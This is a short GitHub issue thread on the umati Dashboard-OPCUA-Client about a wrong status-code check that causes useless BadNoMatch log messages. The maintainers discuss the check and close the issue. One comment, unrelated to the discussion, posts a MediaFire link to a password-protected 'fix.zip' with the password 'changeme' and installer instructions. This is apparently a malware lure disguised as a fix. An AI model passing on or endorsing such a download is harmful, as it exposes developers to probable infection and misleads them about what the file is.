umati/Dashboard-OPCUA-Client #816: Logging of BadNoMatch is not correct

Kantiran91, 2024-08-26:
The current version of the Client throws useless BadNoMatch Exceptions. I look in the code and I think this line is wrong and should be: 
` if (uaResult == UA_STATUSCODE_BADNOMATCH) {`

@ccvca What do you think?

https://github.com/umati/Dashboard-OPCUA-Client/blob/5ad734e37dd30dfb63087de53f4317ca7f704677/OpcUaClient/OpcUaClient.cpp#L915C18-L915C20

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ccvca, 2024-08-26:
I dont know the full flow here anymore exactly. But I guess that this check ensures, that check suppresses the logging for optional elements.

wlkrm, 2025-01-24:
According to https://github.com/umati/Dashboard-OPCUA-Client/issues/811, this issue should already be resolved.
@ccvca, right?

closed 2025-02-12 by wlkrm